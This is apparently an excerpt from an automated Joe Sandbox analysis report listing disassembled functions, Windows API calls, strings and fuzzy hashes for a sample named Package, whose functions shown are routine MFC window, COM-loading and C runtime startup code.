SetLastError.KERNEL32(00000000,6E2F1286,?,00000001,?,?,00000001,?,6E304520,0000000C,6E2F137F,?,00000001,?), ref: 6E2F23E3

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: be4c8407ddbdec5f53ed8a3f5dfae24ae6ffcd1b4c761f8054011e63827e8d9f
Instruction ID: 2a1896f180becc44bbb75a0d491d16296b0be4422812539845b948488bb74d65
Opcode Fuzzy Hash: be4c8407ddbdec5f53ed8a3f5dfae24ae6ffcd1b4c761f8054011e63827e8d9f
Instruction Fuzzy Hash: 1B01DEF71EDA5FEFA64405F46C84A4AA6AEEB0367A330022EF920821D8EF5148438350

Function 00D2F150 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2F167
#3087.MFC42U(00001FA5,00000000), ref: 00D2F17D
#2634.MFC42U(00001FA5,00000000), ref: 00D2F184
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2F192
#3087.MFC42U(0000009C,00000000), ref: 00D2F1A8
#2634.MFC42U(0000009C,00000000), ref: 00D2F1AF

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634#3087MessageSend
String ID:
API String ID: 496076185-0
Opcode ID: 9dbf915d694336585cdace3e3f3b2a7842f2eb48af39a1128efbdaa912eacd34
Instruction ID: 47eba378d5d98c5a41f7804ea2153a03186ad2e7abdf790ced68e157a327f22c
Opcode Fuzzy Hash: 9dbf915d694336585cdace3e3f3b2a7842f2eb48af39a1128efbdaa912eacd34
Instruction Fuzzy Hash: 72F08CB6B103602BEB282B719C9AE2F6A9DDBC5B61F41042DB106C61E0DEB55D418275

Function 00D2C4B6 Relevance: 9.0, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2C4BD
#324.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4CE
#567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4E5
#567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C500
#567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C516
#567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C52C

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567$#324H_prolog3
String ID:
API String ID: 3217428371-0
Opcode ID: c69b1c8699b7fb16e12a4e5060d7ce0d81bcaa560ddfd0122e5bc8817890af49
Instruction ID: 82f8b34cb923cb4ff15cc1c882f4cc5e1ea4772d9f741900fb8afc71c1c830e3
Opcode Fuzzy Hash: c69b1c8699b7fb16e12a4e5060d7ce0d81bcaa560ddfd0122e5bc8817890af49
Instruction Fuzzy Hash: E201E971A0126ADBDB059F9489023ECBBA0AF55700F60405EE58077381CBB41B05CBF6

Function 00D30A74 Relevance: 9.0, APIs: 6, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

#693.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A85
#609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A90
#609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A9B
#609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AA6
#609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AAE

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #609$#693
String ID:
API String ID: 2192965535-0
Opcode ID: 572b1ce18a2c58596f160bef650ca954490cf96d35471924bbbc5918a3e2e5d1
Instruction ID: ad377b74d2f0fa47a32304e9d9935882ed3d5bcf9c62e69f253d24dcdf8e91a6
Opcode Fuzzy Hash: 572b1ce18a2c58596f160bef650ca954490cf96d35471924bbbc5918a3e2e5d1
Instruction Fuzzy Hash: 3FE0BF35184616DBC274EB30D4916EAF7A2FF54351F51062DB0AB035E1AF706B89CB70

Function 6E2F7136 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\Temp\Package.exe, xrefs: 6E2F7152

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\Package.exe
API String ID: 0-234654675
Opcode ID: 3f73dfd17054b5027a438bace37b8ea922b9ed17aa1537ca1c541d233df3932f
Instruction ID: 6866b5f5a1fa7d623b70d375750bb5f06b4d0310d14fabf1dba228e061442954
Opcode Fuzzy Hash: 3f73dfd17054b5027a438bace37b8ea922b9ed17aa1537ca1c541d233df3932f
Instruction Fuzzy Hash: 40218E712A420EEF97009EE5DC8098BF7AFAF053697088928E925C7180DB30ED178760

Function 6E2F41F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7763BC5F,?,?,00000000,6E2FEC9D,000000FF,?,6E2F418D,00000000,?,6E2F4161,6E2F1014), ref: 6E2F4228
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E2F423A
FreeLibrary.KERNEL32(00000000,?,?,00000000,6E2FEC9D,000000FF,?,6E2F418D,00000000,?,6E2F4161,6E2F1014), ref: 6E2F425C

Strings

mscoree.dll, xrefs: 6E2F4221
CorExitProcess, xrefs: 6E2F4232

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2ed8d8f07e4bc21f8442af753882e3f4c59055b83cb77c8f9b65e6a99e83444b
Instruction ID: 6545d233b8679dcb78ceca2794323986f6af699870f86a12e4545ed0b6e6792c
Opcode Fuzzy Hash: 2ed8d8f07e4bc21f8442af753882e3f4c59055b83cb77c8f9b65e6a99e83444b
Instruction Fuzzy Hash: 9401AC31994A2DEBEF018F90DC18BAFBBBAFB45721F104529F822A2384D7749901CA50

Function 00D2B300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

#1143.MFC42U(00000093,0000000E,00000093), ref: 00D2B31D
LoadIconW.USER32(00000000,00000093), ref: 00D2B323
#1165.MFC42U ref: 00D2B32B

Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424

ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00D2B34B

Strings

Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00D2B344

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1143#1165#1172AboutIconLoadShell
String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
API String ID: 29937196-3714244911
Opcode ID: c0001f7b2b5f645597ceddbb0db9400edc87c80af203321a2bc78a63d08e78b8
Instruction ID: be9596169ac061145712e64efbdb7860a15417622cde7dfd9509733160a5d962
Opcode Fuzzy Hash: c0001f7b2b5f645597ceddbb0db9400edc87c80af203321a2bc78a63d08e78b8
Instruction Fuzzy Hash: B4E086356013206BD6243772FC1EE5B2B2DDFA2775F1504267442E3252D7A8C9428570

Function 00D3DCEB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00D3DD1D
wsprintfW.USER32 ref: 00D3DD47

Strings

severity: %s, facility: %s ($%08lX), xrefs: 00D3DD41
range: %s ($%08lX), xrefs: 00D3DD12
%s ($%08lX), xrefs: 00D3DD00

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: wsprintf
String ID: %s ($%08lX)$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
API String ID: 2111968516-3060768123
Opcode ID: 421e0c1f0afa9162ea05ade29c4cebc8af3e6aa7011225f4539348e699c33c4b
Instruction ID: ee3a253cbbd0de29486504a331a90f0708fe014d0f91f36c58f602d17758ec14
Opcode Fuzzy Hash: 421e0c1f0afa9162ea05ade29c4cebc8af3e6aa7011225f4539348e699c33c4b
Instruction Fuzzy Hash: 10F0EC32A423307B96002B683C02CBB7A4ECD63752F4C0021FE44F7342CA909E12DAFA

Function 00D2B310 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27windowCOMMON

Download Yara Rule

APIs

#1143.MFC42U(00000093,0000000E,00000093), ref: 00D2B31D
LoadIconW.USER32(00000000,00000093), ref: 00D2B323
#1165.MFC42U ref: 00D2B32B

Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424

ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00D2B34B

Strings

Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00D2B344

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1143#1165#1172AboutIconLoadShell
String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
API String ID: 29937196-3714244911
Opcode ID: 70f9d2e3c770333b870a6e8131a7e15a3d3da1daca5c45faee23c70bb597dc4b
Instruction ID: 46a686780f61c847832b943f4da3d70df994b472551208fd16f8e8754a5cfa90
Opcode Fuzzy Hash: 70f9d2e3c770333b870a6e8131a7e15a3d3da1daca5c45faee23c70bb597dc4b
Instruction Fuzzy Hash: 4CE04F756003206BD7247771FD1AE6B2B2DDFA2775B060466B446E7292DBA4C84286B0

Function 00D3DB15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(OLE32.DLL,?,00D2E204,?,?,?), ref: 00D3DB2B
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 00D3DB3D
FreeLibrary.KERNEL32(00000000,?,00D2E204,?,?,?), ref: 00D3DB52

Strings

CoInitializeEx, xrefs: 00D3DB37
OLE32.DLL, xrefs: 00D3DB26

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CoInitializeEx$OLE32.DLL
API String ID: 145871493-3669712014
Opcode ID: 4aab8a2e9d3e972cec39519f11d68b3e97f9c2c0de8dcd3a284ca0294c08db7a
Instruction ID: 3f42983720836e3e3a78a7db633f3d4f894d440083d5111ea2fc1b464fc44bc5
Opcode Fuzzy Hash: 4aab8a2e9d3e972cec39519f11d68b3e97f9c2c0de8dcd3a284ca0294c08db7a
Instruction Fuzzy Hash: D8E04F395417A09FDB206F58BC0C78676A6BB23727F090204E510D23A0CB748644CA75

Function 6E2FA6E5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6E2FA76A
__alloca_probe_16.LIBCMT ref: 6E2FA833
__freea.LIBCMT ref: 6E2FA89A

Part of subcall function 6E2F9163: HeapAlloc.KERNEL32(00000000,6E2F76AF,6E2F8E7D,?,6E2F76AF,00000220,?,?,6E2F8E7D), ref: 6E2F9195

__freea.LIBCMT ref: 6E2FA8AD
__freea.LIBCMT ref: 6E2FA8BA

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: c5e1c4968f0a488f70025d0daef80f7b6c2a99faf3dd93cd43f71a62ab8668fa
Instruction ID: 51595ebe8193635c3ac4eab645c371c1e8ae413c01fa4dda21f0c7d7f480429c
Opcode Fuzzy Hash: c5e1c4968f0a488f70025d0daef80f7b6c2a99faf3dd93cd43f71a62ab8668fa
Instruction Fuzzy Hash: 2951BFB6A9120FEFEB054EE5CC80EABB6AFEF84755B110528FC2496150E7B0CC138660

Function 6E2F122D Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6E2F126A
dllmain_crt_dispatch.LIBCMT ref: 6E2F1281
dllmain_raw.LIBCMT ref: 6E2F12C9
dllmain_crt_dispatch.LIBCMT ref: 6E2F12DC
dllmain_raw.LIBCMT ref: 6E2F12EF

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c625b049ef13aed4ffa7aaf447b462d264e2392c74cd9da55404f563ee6f1465
Instruction ID: 35416e6a67d8d7e5403066d05ec31deb0774dd525f438238564ad72ce5b5ed60
Opcode Fuzzy Hash: c625b049ef13aed4ffa7aaf447b462d264e2392c74cd9da55404f563ee6f1465
Instruction Fuzzy Hash: 5321A5B1D8026EEFDB114ED5C840AAEBA7FDB81695F804519F81466216D7318D8B8B90

Function 00D30900 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

#2371.MFC42U ref: 00D30917
#6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00D3096E
GetWindowRect.USER32(00000000,?), ref: 00D30939

Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC

GetWindowRect.USER32(00000000,?), ref: 00D3098D
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D309BF

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6193ClientRectScreenWindow$#2371#3133
String ID:
API String ID: 3329109363-0
Opcode ID: 97b3145adcf005e039081d407af3dcb70182a943c9643da1255e76ba7162252e
Instruction ID: c9d63d71df4a8ed7ac99748d50d0848e31bcbec0db6959e65b85edfb0d7d9a1f
Opcode Fuzzy Hash: 97b3145adcf005e039081d407af3dcb70182a943c9643da1255e76ba7162252e
Instruction Fuzzy Hash: 42212E71A00209ABDB14DF78CD45FEEB7B9EF88714F084219B515E72D1DB30AA05CA74

Function 00D2C3D0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

#2371.MFC42U ref: 00D2C3E7
#6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00D2C43E
GetWindowRect.USER32(00000000,?), ref: 00D2C409

Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC

GetWindowRect.USER32(00000000,?), ref: 00D2C45D
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D2C48F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6193ClientRectScreenWindow$#2371#3133
String ID:
API String ID: 3329109363-0
Opcode ID: a16eb351c8f602e2dfaf08ec99fc8cd2abc5bd0fab638eb972069a85083eeba0
Instruction ID: a8cdbd231bb580d54d6257fe1a4efcbec4a2171aaacfae28566b3fbf468d701e
Opcode Fuzzy Hash: a16eb351c8f602e2dfaf08ec99fc8cd2abc5bd0fab638eb972069a85083eeba0
Instruction Fuzzy Hash: DC216B71600219ABDB24DFB8DD45FEFB7B9EF88714F144218B525A72C1DB30AE058A70

Function 00D2B6B0 Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00D2B6D7
CoFreeUnusedLibraries.OLE32 ref: 00D2B6EA
GetTickCount.KERNEL32 ref: 00D2B6F0
#4692.MFC42U(?), ref: 00D2B700
GetTickCount.KERNEL32 ref: 00D2B720

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CountTick$#4692FreeLibrariesUnused
String ID:
API String ID: 1635327766-0
Opcode ID: a21ade753210b66a59082d15129ebb99286c8a5b26c97ee0dfc07852d43a3915
Instruction ID: 706ac799114016b63922896446beeef21261e63dd504d59e663e607ffdc18675
Opcode Fuzzy Hash: a21ade753210b66a59082d15129ebb99286c8a5b26c97ee0dfc07852d43a3915
Instruction Fuzzy Hash: 5501D13A400355DBC320EF6CF849929B7A5EFAB731B24022BE408C7760CBB099818E75

Function 00D30B66 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F02), ref: 00D30B85
SetCursor.USER32(00000000,?,?,?,?,00D2DF45), ref: 00D30B8C

Part of subcall function 00D30BBB: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D30BE4
Part of subcall function 00D30BBB: #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00D30C33
Part of subcall function 00D30BBB: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C46
Part of subcall function 00D30BBB: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C57

#6330.MFC42U(00000000,?,?,?,?,00D2DF45), ref: 00D30B9C
LoadCursorW.USER32(00000000,00007F00), ref: 00D30BA7
SetCursor.USER32(00000000,?,?,?,?,00D2DF45), ref: 00D30BAE

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursor$MessageSend$Load$#2634#6330
String ID:
API String ID: 3859525188-0
Opcode ID: 4c05e6c171fa50327f9ed7315e1f332ef13e084b1e7938ffda489ab99e8c6d85
Instruction ID: fb565334452a0ae7dbc30286f094851be7c15bb32085ad678860231fb4746944
Opcode Fuzzy Hash: 4c05e6c171fa50327f9ed7315e1f332ef13e084b1e7938ffda489ab99e8c6d85
Instruction Fuzzy Hash: 39F0A0366013246B87016FE59C4DE9B7F9DEF877517000426FA16DB242CBB8980786F0

Function 00D2D7A2 Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

#810.MFC42U(?,00D2D83D), ref: 00D2D7B3
#795.MFC42U(?,00D2D83D), ref: 00D2D7BE
#795.MFC42U(?,00D2D83D), ref: 00D2D7C9
#795.MFC42U(?,00D2D83D), ref: 00D2D7D4
#804.MFC42U(?,00D2D83D), ref: 00D2D7DF

Part of subcall function 00D394F7: #810.MFC42U(?,00D2D7EF,?,00D2D83D), ref: 00D39505

Part of subcall function 00D2C9F5: #800.MFC42U(?,00D2CA4D), ref: 00D2CA06
Part of subcall function 00D2C9F5: #800.MFC42U(?,00D2CA4D), ref: 00D2CA11
Part of subcall function 00D2C9F5: #656.MFC42U(?,00D2CA4D), ref: 00D2CA1C
Part of subcall function 00D2C9F5: #609.MFC42U(?,00D2CA4D), ref: 00D2CA24

Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F47D
Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F488
Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F493
Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F49E
Part of subcall function 00D2F46C: #616.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4A9
Part of subcall function 00D2F46C: #656.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4B4
Part of subcall function 00D2F46C: #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4BF
Part of subcall function 00D2F46C: #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4CA
Part of subcall function 00D2F46C: #804.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4D2

Part of subcall function 00D30A74: #693.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A85
Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A90
Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A9B
Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AA6
Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AAE

Part of subcall function 00D2C53F: #693.MFC42U(?,00D2C5BD), ref: 00D2C550
Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C55B
Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C566
Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C56E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #609$#800$#795$#656#693#804#810$#616
String ID:
API String ID: 1443703491-0
Opcode ID: a4ab8571306499fa6393f30e238bc9cf0612b05e0c2f700ad9bc77b5b011e408
Instruction ID: 7474ebd397c26c1e5c5be86040e4f2317b16b8a9d3f753f1ae2fc7e06cb3eec4
Opcode Fuzzy Hash: a4ab8571306499fa6393f30e238bc9cf0612b05e0c2f700ad9bc77b5b011e408
Instruction Fuzzy Hash: 90F0AF314146158AC238FB30E8616EAB3A1FF64354F90496DA0AB021D2AF647909CFB0

